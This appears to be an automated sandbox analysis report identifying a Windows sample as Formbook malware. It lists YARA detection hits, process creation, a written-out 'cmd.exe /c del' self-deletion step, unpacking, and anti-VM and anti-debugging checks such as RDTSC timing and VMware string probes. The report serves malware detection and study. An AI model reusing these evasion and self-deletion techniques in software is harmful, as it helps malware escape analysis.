          Source: 00000001.00000002.720881114.0000000000A00000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.720881114.0000000000A00000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.OrderKLB210568.exe.22b0000.3.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.OrderKLB210568.exe.22b0000.3.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.OrderKLB210568.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.OrderKLB210568.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.OrderKLB210568.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.OrderKLB210568.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.OrderKLB210568.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.OrderKLB210568.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.OrderKLB210568.exe.22b0000.3.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.OrderKLB210568.exe.22b0000.3.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.OrderKLB210568.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.OrderKLB210568.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: classification engine Classification label: mal100.troj.evad.winEXE@7/4@15/8
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 0_2_00404356 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 0_2_00402020 CoCreateInstance,MultiByteToWideChar,
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6632:120:WilError_01
Source: C:\Users\user\Desktop\OrderKLB210568.exe File created: C:\Users\user\AppData\Local\Temp\nsq144A.tmp
Source: OrderKLB210568.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\OrderKLB210568.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\OrderKLB210568.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: OrderKLB210568.exe ReversingLabs: Detection: 32%
Source: C:\Users\user\Desktop\OrderKLB210568.exe File read: C:\Users\user\Desktop\OrderKLB210568.exe
Source: unknown Process created: C:\Users\user\Desktop\OrderKLB210568.exe 'C:\Users\user\Desktop\OrderKLB210568.exe'
Source: C:\Users\user\Desktop\OrderKLB210568.exe Process created: C:\Users\user\Desktop\OrderKLB210568.exe 'C:\Users\user\Desktop\OrderKLB210568.exe'
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exe
Source: C:\Windows\SysWOW64\raserver.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\OrderKLB210568.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\OrderKLB210568.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000004.00000000.712034262.0000000005A00000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: OrderKLB210568.exe, 00000000.00000003.659659585.0000000009A30000.00000004.00000001.sdmp, OrderKLB210568.exe, 00000001.00000002.721198139.0000000000BAF000.00000040.00000001.sdmp, raserver.exe, 00000009.00000002.923390978.00000000051EF000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: OrderKLB210568.exe, raserver.exe
Source: Binary string: RAServer.pdb source: OrderKLB210568.exe, 00000001.00000002.720929756.0000000000A30000.00000040.00000001.sdmp
Source: Binary string: RAServer.pdbGCTL source: OrderKLB210568.exe, 00000001.00000002.720929756.0000000000A30000.00000040.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000004.00000000.712034262.0000000005A00000.00000002.00000001.sdmp

          Data Obfuscation:

Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\OrderKLB210568.exe Unpacked PE file: 1.2.OrderKLB210568.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 0_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 0_2_6FC42F60 push eax; ret
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_00416251 pushad ; retf
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_00416233 pushad ; retf
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_0040C2D9 push eax; retf
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_00415B74 push ebp; iretd
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_0040C307 push eax; retf
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_0041B3B5 push eax; ret
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_0041B46C push eax; ret
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_0041B402 push eax; ret
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_0041B40B push eax; ret
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_0041CD5B push ecx; ret
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_00B0D0D1 push ecx; ret
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_1_00416251 pushad ; retf
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_1_00416233 pushad ; retf
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_1_0040C2D9 push eax; retf
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_1_00415B74 push ebp; iretd
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_1_0040C307 push eax; retf
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_1_0041B3B5 push eax; ret
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_1_0041B46C push eax; ret
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_1_0041B402 push eax; ret
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_1_0041B40B push eax; ret
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_1_0041CD5B push ecx; ret
Source: C:\Windows\SysWOW64\raserver.exe Code function: 9_2_0514D0D1 push ecx; ret
Source: C:\Windows\SysWOW64\raserver.exe Code function: 9_2_0100C307 push eax; retf
Source: C:\Windows\SysWOW64\raserver.exe Code function: 9_2_01015B74 push ebp; iretd
Source: C:\Windows\SysWOW64\raserver.exe Code function: 9_2_0101B3B5 push eax; ret
Source: C:\Windows\SysWOW64\raserver.exe Code function: 9_2_01016233 pushad ; retf
Source: C:\Windows\SysWOW64\raserver.exe Code function: 9_2_01016251 pushad ; retf
Source: C:\Windows\SysWOW64\raserver.exe Code function: 9_2_0100C2D9 push eax; retf
Source: C:\Windows\SysWOW64\raserver.exe Code function: 9_2_0101CD5B push ecx; ret
Source: C:\Windows\SysWOW64\raserver.exe Code function: 9_2_0101B402 push eax; ret
Source: C:\Users\user\Desktop\OrderKLB210568.exe File created: C:\Users\user\AppData\Local\Temp\nsq144C.tmp\System.dll
Source: C:\Users\user\Desktop\OrderKLB210568.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\OrderKLB210568.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\raserver.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\OrderKLB210568.exe RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OrderKLB210568.exe RDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\raserver.exe RDTSC instruction interceptor: First address: 00000000010085E4 second address: 00000000010085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\raserver.exe RDTSC instruction interceptor: First address: 000000000100897E second address: 0000000001008984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OrderKLB210568.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_004088B0 rdtsc
Source: C:\Windows\explorer.exe TID: 5768 Thread sleep time: -40000s >= -30000s
Source: C:\Windows\SysWOW64\raserver.exe TID: 1284 Thread sleep time: -46000s >= -30000s
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\raserver.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\raserver.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 0_2_00405E61 FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 0_2_0040548B CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 0_2_0040263E FindFirstFileA,
Source: explorer.exe, 00000004.00000000.688063806.000000000A9D6000.00000004.00000001.sdmp Binary or memory string: War&Prod_VMware_SATA
Source: explorer.exe, 00000004.00000000.681889045.00000000058C0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000004.00000000.686089155.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.682313880.0000000006650000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.678930816.0000000004710000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: explorer.exe, 00000004.00000000.686288903.000000000A716000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: explorer.exe, 00000004.00000000.681889045.00000000058C0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000004.00000000.681889045.00000000058C0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000004.00000000.686368978.000000000A784000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: explorer.exe, 00000004.00000000.681889045.00000000058C0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\OrderKLB210568.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\OrderKLB210568.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\raserver.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_00409B20 LdrLoadDll,
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_00AF90AF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_00AE20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_00AEF0BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_00AEF0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_00AB9080 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_00B33884 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_00AB58EC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_00AB40E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_00B4B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_00B4B8D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_00AE002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_00ACB02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_00B37016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_00B84015 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_00B72073 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_00B81074 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_00AD0050 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_00B351BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_00AE61A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_00B749A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_00B369A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_00AEA185 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_00ADC182 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_00AE2990 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_00ABB1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_00B441E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_00AD4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_00AD4120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_00AE513A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_00AB9100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_00ABC962 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_00ABB171 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_00ADB944 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_00AB52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_00ACAAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_00AEFAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_00AED294 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_00AE2AE4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_00AE2ACB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_00AF4A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_00B7AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_00AC8A0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_00AD3A1C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_00AB5210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_00AB5210 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_00ABAA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_00AF927A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_00B6B260 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_00B88A62 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_00B7EA55 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_00B44257 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_00AB9240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_00AE4BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_00B85BA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_00AC1B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_00B6D380 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_00AE2397 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_00B7138A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_00AEB390 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_00ADDBE9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_00AE03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_00B353CA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_00B7131B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_00ABDB60 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_00AE3B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_00B88B58 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_00ABDB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_00ABF358 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_00AC849B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_00B36CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_00B714FB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_00B88CD6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_00AEBC2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_00B71C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_00B8740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\OrderKLB210568.exe Code function: 1_2_00B36C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B36C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B36C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AD746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B4C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B4C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AEA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AE35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B805AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B805AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AE1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AE1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AE1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AB2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AB2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AB2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AB2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AB2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AE2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AE2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AE2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AE2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AEFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AEFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B68DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00ACD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00ACD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B7FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B7FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B7FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B7FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B36DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B36DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B36DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B36DC9 mov ecx, dword ptr fs:[00000030h]
